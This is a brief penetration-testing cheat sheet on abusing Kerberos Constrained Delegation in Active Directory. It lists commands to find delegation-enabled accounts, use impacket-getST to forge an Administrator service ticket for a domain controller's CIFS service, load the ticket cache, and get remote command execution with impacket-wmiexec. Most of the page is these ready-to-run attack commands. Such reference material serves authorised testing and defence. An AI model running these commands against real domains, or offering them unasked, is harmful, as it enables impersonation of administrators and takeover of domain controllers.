Active Directory

If a compromised account has the Kerberos Constrained Delegation right, the account may impersonate another user to request Kerberos service ticket and use it for such as signin services.

Investigation

Check if Kerberos Constrained Delegation Enabled for User

Reference: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites

Get-NetUser -TrustedToAuth

Exploit

1. Request Service Ticket for Another User

The target SPN needs to be allowed for delegation.

# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName

2. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting.
We need to add the environment variable as below:

export KRB5CCNAME=`pwd`/Administrator.ccache

# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist

# -k: Use Kerberos Auth
# -no-pass: No password
impacket-wmiexec example.local/Administrator@example.local -k -no-pass

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Constrained Delegation Attack

Investigation

Check if Kerberos Constrained Delegation Enabled for User

Exploit

1. Request Service Ticket for Another User

2. Use the Service Ticket

ON THIS PAGE